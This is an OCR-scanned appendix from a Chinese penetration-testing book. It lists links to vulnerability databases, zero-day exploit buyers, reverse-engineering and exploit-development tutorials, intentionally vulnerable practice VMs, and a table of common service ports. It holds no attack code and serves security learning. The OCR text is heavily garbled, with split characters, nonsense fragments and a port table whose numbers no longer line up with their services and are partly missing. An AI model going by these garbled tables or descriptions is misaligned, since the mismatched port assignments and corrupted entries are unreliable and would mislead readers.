http://www.ubuntu.com/usn 
http://www.first.org/cvss/ 


http://tools.cisco.com/security/center 
/publicationListing.x 


http://www.security-database.com 


http://www.securitytracker.com/ 
http://www.auscert.org.au/ 


http://en.securitylab.ru/ 
http://corelabs.coresecurity.com/ 
https: //www.htbridge.com/ 
http: //www.offensivecomputing.net/ 


http://measurablesecurity. 
mitre.org/ 


B1.1 奖励 计划 
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描述 
、 和 白皮书、 安全 情况 介绍 和 研究 论文 
exploit 数据 库 、Google Hacking Database (GHDB) 
和 论文 
NVD 是 美国 政府 使 用 的 基于 CVE 的 漏洞 数据 库 


RedHat 勘误 通知 和 安全 建议 


CentOS 的 安全 公告 列表 和 常规 公公 开 邮 件 列表 服务 


美国 国土 安全 部 US-CERT 刊登 安全 问题 、 安全 漏 
洞 和 exploit 的 技术 公告 的 网 站 

ISS X-Force 提供 威胁 警报 、 安 全 公告 、 漏 洞 库 和 
白皮书 的 资料 

Debian 安全 公告 和 邮件 列表 

Mandriva Linux 安全 公告 

SUSE Linux Enterprise 安全 公告 


微软 安全 通报 

Ubuntu 的 安全 通知 

First Common Vulnerability Scoring System(CVSS-SIG ) 
思科 的 安全 公告 、 响 应 和 通知 

安全 和 警报、 仪表 板 和 CVSS 的 计算 器 


安全 漏洞 信息 
澳大利亚 CERT 刊登 安全 通告 、 公 告 、 和 警告 、 演 
示 文 稿 和 论文 的 网 站 


公告 、 漏 洞 数据 库 、PoC 和 病毒 专题 报告 

漏洞 研究 、 出 版 物 、 安 全 公告 和 安全 工具 

安全 公告 及 安全 出 版 物 

恶意 代码 样本 仓库 

MITRE 提供 了 可 用 于 脆弱 性 管理 、 入 侵 检测 、 安 全 
的 资产 评估 、 资 产 管理 、 配 置 指导 、 补 丁 管理 、 恶 意 
软件 响应 、 事 件 管 理 和 威胁 分 析 的 业内 交流 标准 协 
议 。 人 们 常 说 的 CVE、CWE、CAPEC 和 CCE 都 属 
于 这 种 协议 


部 分 公司 公开 收购 zero-day exploit 程序 。 


URL 
http://www.zerodayinitiative.com/ 


http://www.netragard.com/zero- 
day-exploit-acquisition-program 


https://gvp.isightpartners.com/ 


https://exploithub.com 


http://www.beyondsecurity.com/ 
ssd.html 


B.2 逆 同 工程 资源 


ERRA LIERNI, K 


URL 
http: //www.woodmann.com/forum/ 
index.php 
http://www.binary-auditing.com/ 
http://www.openrce.org/ 
http://reversingproject.info/ 


http://www.reteam.org/ 


http://www.exetools.com/ 
http://tuts4you.com/ 
http://crackmes.de/ 
http://fumalwareanalysis. 


blogspot .com/p/malware-analysis-tuto 
rials-reverse.html 


http: //quequero.org/ 


B.3 渗透 测试 学 习 资源 


描述 
3Com/TippingPoint 的 Zero-Day Initiative 计划 
Netagard 收购 Zero-day exploits 
iSIGHT partners ÍJ GVP (Global Vulnerability Partnership ) 
计划 
漏洞 测试 的 交易 市 场 
SecuriTeam 的 安全 披露 计划 ， 可 为 汇报 漏洞 的 研究 人 


员 提 供 奖 金 


描述 
逆向 工程 论 ， 它 整理 了 各 种 知识 ， 并 介绍 了 各 种 工具 


使 用 IDA Pro 进行 可 执行 程序 审计 的 免费 培训 资料 
开放 的 逆向 工程 社区 

提供 学 习 软 件 逆 向 工程 所 需 的 工具 、 文 件 和 练习 题目 
这 个 逆向 工程 团队 分 享 了 大 量 项 目 、 论 文 、 练 习题 和 
工具 

教程 、 文 件 分 析 工 具 、 压 缩 工具 、 十 六 进 制 编辑 器 、 
保护 程序 、 解 包 程 序 、 调 试 器 、 反 汇编 工具 、 补 丁 …… 
逆向 工程 的 教程 和 工具 

读者 可 在 完成 这 个 网 站 的 作业 (也 就 是 常 说 的 crackme) 的 
同时 ， 测 试 、 提 高 自身 的 逆向 工程 水 平 

恶意 软件 分 析 教 程 。 它 使 用 逆向 工程 的 手段 进行 代码 
分 析 

UIC R.E. 只 在 于 向 所 有 希望 学 习 逆 向 工程 的 人 士 免费 
进行 教学 。 这 个 网 站 分 享 了 恶意 代码 分 析 文 章 ， 以 及 
几 款 逆向 工程 工具 


如 果 您 需要 深入 地 学 习 渗 透 测试 领域 的 有 关 知 识 ， 那 么 可 以 参考 


以 下 资源 。 


URL 
http://www.kali.org/blog/ 


http://pen-testing.sans.org 


http://resources.Infosecinstitute. 
com/ 


http://www.securitytube.net/ 


http://www.concise-courses.com/ 


http://opensecuritytraining.info/ 
Training.html 


https://pentesterlab.com/bootcamp/ 


http://www.pentesteracademy.com/ 


http://www.pentest-standard.Org 


http://www.ethicalhacker.net/ 
https://community.rapid7.com/ 
community/metasploit/blog 
http://www.blackhatlibrary.net/ 
Main Page 
http://www.offensive-security. 
com/metasploit-unleashed/Main Page 
http://www.codecademy.com/learn 
http://www.social-engineer. 
org/framework/Computer Based 
Social Engineering Tools: Social 
Engineer Toolkit $28SET$29 


描述 
Kali Linux 的 博客 
SANS 提供 的 渗透 测试 资源 : 博客 、 白 皮 书 、 网 络 视 
频 、 笔 记 小 抄 ， 以 及 各 种 技术 链接 
收录 了 大 量 信 息 安全 的 技术 文章 ， 其 内 容 涉 及 破解 逆 
向 工程 、 法 证 调查 、 应 用 安全 等 
这 个 网 站 有 很 多 信息 安全 的 教学 视频 ， 它 的 大 部 分 视频 
讲解 得 都 很 深入 ， 较 为 著名 教程 的 有 Metasploit 框架 、 
WiFi 安全 、exploit 研究 等 教程 
这 个 网 站 有 很 多 信息 安全 方面 的 在 线 课程 ， 部 分 课程 
是 收费 课程 
这 个 网 站 上 分 享 了 很 多 计算 机 安全 课程 的 培训 资料 。 它 几 
乎 涵盖 了 信息 安全 的 所 有 课题 ， 而 且 每 个 课题 的 教学 资料 
足以 满足 一 整 天 的 培训 需求 
如 果 您 还 不 了 解 如 何 成 为 专业 的 渗透 测试 人 员 ， 那 么 这 
个 网 站 就 适合 您 参考 了 。 需 要 15 周 的 集中 培训 时 间 ， 才 
能 讲解 完 它 的 全 部 教学 资料 。 它 的 内 容 可 分 为 自学 资料 
和 上 手 练习 两 个 部 分 
在 线 培训 信息 安全 的 网 站 。 它 涉及 Web 应 用 程序 渗 
透 、 网 络 渗透 等 课题 。 部 分 视频 可 免费 下 载 ， 换 句 话 
说 ， 只 有 会 员 才 能 下 载 其 他 视频 
“渗透 测试 执行 标准 ”在 渗透 测试 技术 领域 的 新 兴 新 
标准 ， 它 使 用 业务 和 安全 技术 通用 的 语言 重新 对 渗透 
测试 进行 定义 ， 并 使 用 这 种 语言 阐述 了 渗透 测试 的 过 
程 和 标准 
面向 信息 安全 专业 人 士 的 免费 网 络 杂 志 


Metasploit 的 博客 
关注 安全 教程 和 安全 工具 的 网 站 
网 站 提供 Metasploit 框架 的 免费 教学 资料 


SET (Social Engineering Toolkit) 的 学 习 资 料 


URL 


http://technet.microsoft.com/en-us 
/library/cc754340%28WS.10%29.aspx 


http: //www.elearnsecurity.com/ 


http://www.offensive-security.com/ 


http://www.dirk-loss.de/ 
python-tools.htm 


B.4 Exploit 研 发 资源 


Windows Server 指令 行 命令 的 参考 资料 


eLearnSecurity 是 IT 安全 服务 的 提供 商 。 他 们 也 向 IT 
专业 人 士 提供 渗透 测试 的 培训 课程 

Kali Linux 的 开发 团队 。 他 们 提供 IT 安全 培训 服务 和 
资格 认证 服务 


渗透 测试 的 Python 工具 


在 学 习 exploit 的 研发 技术 时 ， 可 参考 以 下 资源 。 


URL 


https://www.corelan.be/index.php/a 
rticles/ 


http://fuzzysecurity.com/ 
tutorials.html 


http://www.thegreycorner.com/ 


B.5 测试 资源 


描述 
这 个 网 站 收录 了 很 多 信息 安全 的 文章 。 它 以 详尽 的 


exploit 编程 自学 资料 而 闻名 
提供 了 Windows 和 Linux 系统 的 exploit 研发 教程 


不 仅 分 享 了 exploit 研发 教程, 而 且 还 提供 了 有 缺陷 的 
服务 端 程序 供 读者 练习 


本 节 将 介绍 一 些 可 进行 在 线 练习 的 Web 应 用 程序 练习 题 ， 以 及 下 载 
后 再 做 离线 练习 的 虚拟 机 镜像 和 ISO 镜像 。 读 者 可 利用 这 些 资源 ， 在 自 
己 的 系统 环境 中 学 习 渗 透 测 试 的 技术 。 


B.5.1 在 线 渗透 练习 


很 多 网 站 都 提供 了 渗透 测试 的 练习 题目 。 读 者 可 利用 这 些 网 站 进 


行 在 线 练习 。 


URL 


https://pentesteracademylab. 
appspot.com/ 


https://hack.me/ 


描述 
如 果 要 练习 form 的 暴力 破解 和 HTTP basic 认证 的 攻 
击 方法 ， 可 试 一 下 这 个 网 站 提供 的 4 道 免 费 练习 题 
Hack.me 是 由 eLearnSecurity 支持 的 免费 项 目 ， 由 其 社 
区 团队 集体 研发 。 在 教育 和 研究 的 范畴 之 内 ， 加 入 社 
区 的 人 员 可 以 组 建 (build)、 搭 建 (host)、 分 享有 安全 
缺陷 的 Web 程序 代码 


URL 描述 


读者 可 在 Hacking-Lab 的 安全 实验 室 〈 网 站 ) 里 练习 


BETERI WAP: DESIDE LET. BIS 各 种 题目 。 他 们 甚至 单独 发 行 了 可 远程 访问 安全 实验 


Li 2 
Sip mg 室 的 Live CD 
https://google-gruyere. 这 个 网 站 讲解 了 Web 应 用 程序 的 攻防 技术 ， 并 提供 了 
appspot.com/ 有 关 的 练习 题目 


Enigma Group 在 这 个 网 站 上 提供 大 量 练习 题 、 以 供 其 

成 员 练 习 各 种 测试 技术 。 它 的 题目 不 仅 涵 盖 了 OWASP 
http://www.enigmagroup.org/ 排名 前 10 的 安全 问题 , 而且 涵 盖 了 最 近 出 现 的 程序 漏 
洞 ， 可 在 帮助 其 成 员 练习 入 侵 技 术 的 同时 、 指 导 他 们 
OWASP Hackademic Challenges Project 是 一 个 供 人 测 
试 Web 应 用 程序 安全 技术 的 开放 源 代 码 项 目 。 它 采用 
Challenges Tate E osos 您 可 以 使 用 真实 的 入 侵 技 

e CAS X 

Hack This Site 是 一 个 免费 、 安 全 、 合 法 的 入 侵 技术 练 
习 平台 。 读 者 可 通过 它 测试 、 学 习 入 侵 技 巧 。 这 个 网 
站 有 大 量 的 技术 文章 ， 并 且 还 有 一 个 讨论 技术 、 网 络 
安全 的 大 型 论坛 


https://www.owasp.org/index. 
php/OWASP Hackademic 


https://www.hackthissite.org/ 


B.5.2 虚拟 机 及 ISO 镜像 
在 研究 渗透 测试 时 ， 您 可 以 在 虚拟 机 里 安装 各 种 虚拟 机 和 ISO T 
像 进行 模拟 练习 。 作 者 向 您 推荐 以 下 几 个 离线 练习 对 象 。 


URL 描述 

它 提 供 了 多 种 虚拟 机 ， 可 用 于 数字 安全 、 应 用 程序 和 网 
络 管理 的 相关 练习 

这 个 网 站 不 仅 提 供 了 大 量 的 虚拟 机 ， 而 且 还 有 计算 机 
http://exploit- 安全 方面 的 教程 和 练习 题 。 这些 资料 可 用 于 权限 提升 、 
exercises.com/ 漏洞 分 析 、 开 发 exploit、 程 序 调试 、 逆 向 工程 和 常规 
安全 范畴 的 上 手 练习 

这 个 网 站 分 享 了 Web 应 用 程序 安全 方面 的 课题 资料 。 
这 些 资料 涵盖 了 SQL 注入 、Axis2、Tomcat 管理 器 、 
MoinMoin 代码 执行 等 课题 。 在 它 的 ISO 镜像 里 ， 您 可 


http://vulnhub.com/ 


https://www. 
pentesterlab.com/ 


Sp 以 找到 每 种 课题 的 详细 教程 ， 以 及 含有 漏洞 的 应 用 程序 

Hackxor 是 一 款 Web 应 用 程序 的 入 侵 游 戏 。 玩 家 必须 找 
http://hackxor. 到 并 利用 有 关 漏洞 ， 才 能 推动 游戏 故事 的 情节 发 展 。 它 
sourceforge.net 帮助 读者 练习 XSS、CSRF、SQLi、ReDoS、DOR、 命 


令 注 射 等 技术 


URL 


https://www.mavensecurity.com/web 
security dojo/ 


http://www.bonsai-sec.com/en/rese 
arch/moth.php 


http://exploit.co.il/projects/ 
vuln-web-app/ 


http://sourceforge.net/projects/ 
lampsecurity/ 


https://bechtsoudis.com/work-stuff/ 
challenges/drunk-admin-web-hacking- 
challenge/ 


https://code.google.com/p/owaspbwa/ 


http://sourceforge.net/projects/ 
bwapp/files/bee-box/ 


http://information.rapid7.com/ 
download-metasploitable.html?LS 
=1631875&CS=web 


B.6 网 络 端口 


描述 
Web Security Dojo 是 一 个 开源 的 独立 训练 环境 ， 可 用 于 
Web 应 用 程序 的 安全 研究 和 渗透 测试 的 练习 
Moth 是 一 个 载 有 不 安全 的 Web 应 用 程序 和 Web 脚本 的 
VMware 虚拟 机 镜像 。 它 可 用 于 : 
e 评估 Web 应 用 程序 安全 扫 瞄 器 
e 测试 SCA (Static Code Analysis) 工具 
e 作为 Web 应 用 程序 导论 的 资料 
这 款 Web 应 用 程序 是 练习 各 种 SQL 注入 技术 的 学 习 平 
台 . 它 实际 上 是 一 个 基于 fckeditor 的 功能 完备 的 CMS( 内 
容 管理 系统 ) 
LAMP Security training 项 目 发 布 了 一 系列 的 、 带 有 安全 漏洞 
的 虚拟 机 镜像 。 其 中 的 各 种 说 明 材 料 可 用 于 Linux、Apache、 
PHP, MySQL 的 安全 教学 
可 这 个 练习 题 的 虚拟 机 镜像 ， 是 一 个 运行 着 多 种 设计 
缺陷 的 Web 服务 器 。 您 必须 枚 举 出 Web 服务 的 各 种 功 
能 ， 并 找到 被 利用 的 安全 漏洞 ， 才 能 解答 题目 一 一 读 
取 系 统 中 的 隐藏 文件 
OWASP Broken Web Applications Project 发 布 的 虚拟 机 
镜像 采用 了 Vmware 兼容 的 镜像 格式 。 这 个 虚拟 机 里 
封装 了 多 个 存在 安全 问题 的 Web 应 用 程序 
bee-box 是 一 个 预 装 有 bWAPP 程序 的 Linux VMware 
虚拟 机 。 您 可 以 通过 多 种 方式 黑 掉 、 毁 掉 bWAPP 的 
网 站 程序 ， 甚 至 可 能 获取 服务 器 的 root 权限 。 总 之 ， 
它 是 一 个 挖掘 bWAPP 漏洞 的 测试 平台 
Metasploitable 2 虚拟 机 搭载 着 一 个 被 故意 设计 得 漏洞 
百出 的 Ubuntu Linux 系统 。 它 旨 在 满足 测试 安全 工具 
和 演示 常规 漏洞 的 技术 需求 


排查 网 络 设备 上 的 关键 漏洞 这 种 事情 既 费 时 又 费力 。 为 了 便于 读 


者 使 用 Kali Linux 工具 快速 地 检索 可 能 存在 弱点 的 网 络 服务 ， 本 文 把 音 
见 的 网 络 服务 及 其 占用 的 端口 号 码 整 理 了 出 来 。 

如 需 获 取 更 为 全 面 的 最 新 的 网 络 端 口 分 配 表 ， 
http://www.iana.org/assignments/port-numbers ° 

需要 注意 的 是 ， 程 序 不 一 定 总 是 占用 默认 的 端口 。 只 
调整 ， 多 数 程序 就 可 以 占用 其 他 的 TCP/PP 端 口 。 


请 参见 


进行 相应 


服务 名 称 
Echo 
Character Generator (CHARGEN) 
FTP data transfer 
FTP control 
SSH 
Telnet 
SMTP 
WHOIS 
TACACS 
DNS 
Bootstrap Protocol (BOOTP) server 
Bootstrap Protocol (BOOTP) client 
TFTP 
HTTP 
Kerberos 
POP3 
SunRPC 
NTP 
NetBIOS (Name service) 
NetBIOS (Datagram service) 
NetBIOS (Session service) 
IMAP 
SNMP 
SNMPTRAP 
BGP 
IRC 
BGMP 
LDAP 
HTTPS 
Microsoft DS 
ISAKMP 


rexec 


110 
111 
123 
137 
138 
139 
143 
161 
162 
179 
194 
264 
389 
443 
445 
500 
512 


Je 
E 


通信 协议 


TCP/UDP 
TCP/UDP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP/UDP 
TCP/UDP 


TCP/UDP 
UDP 
TCP/UDP 
TCP/UDP 
TCP/UDP 
TCP 
UDP 
TCP/UDP 
TCP/UDP 
TCP/UDP 
TCP/UDP 
TCP/UDP 
TCP 
TCP/UDP 
TCP/UDP 
TCP 


服务 名 称 
rlogin 
Who 
rsh 
Syslog 
Talk 
RIP/RIPv2 
Timed 
klogin 
MacOS XSever Administration 
Spamassassin 
rsync 
IMAPS 
POP3S 
SOCKS 
Nessus 
IBM Lotus Notes 
Timbuktu-srv 1 
MSSQL 
Citrix 
Oracle default listener 
Ingres 
Oracle common alternative for listener 
PPTP 
radius 
Cisco SCCP 
NFS 
OpenView network node manager daemon 
Microsoft Global Catalog 
MySQL 
Microsoft Terminal Service 


NFS-lockd 


Ed 
L 
ul 


1417-1420 
1433 
1494 
1521 
1524 
1526 
1723 
1812 
2000 
2049 
2447 
3268 
3306 
3389 
4045 


通信 协议 


TCP 


UDP 
TCP/UDP 
UDP 
UDP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP/UDP 
TCP 
TCP 
TCP 
TCP/UDP 
TCP 
TCP/UDP 
TCP/UDP 
TCP/UDP 
TCP 
TCP/UDP 
TCP/UDP 


SIP 

Multicast DNS 
PostgreSQL 
PCAnywhere 
VNC 

X11 

ArcServe 
BackupExec 
Gnutella 
Gnutella alternate 
IRC 

Web 

Privoxy 
Polipo 
Cisco-xremote 
Jetdirect 
Netbus 

Quake 

Back Orifice 


服务 名 称 


6665~ 6670 
8080 
8118 
8123 
9001 
9100 
12345 
27960 
31337 


通信 协议 
TCP/UDP 
UDP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP/UDP 
TCP/UDP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
UDP 
UDP 


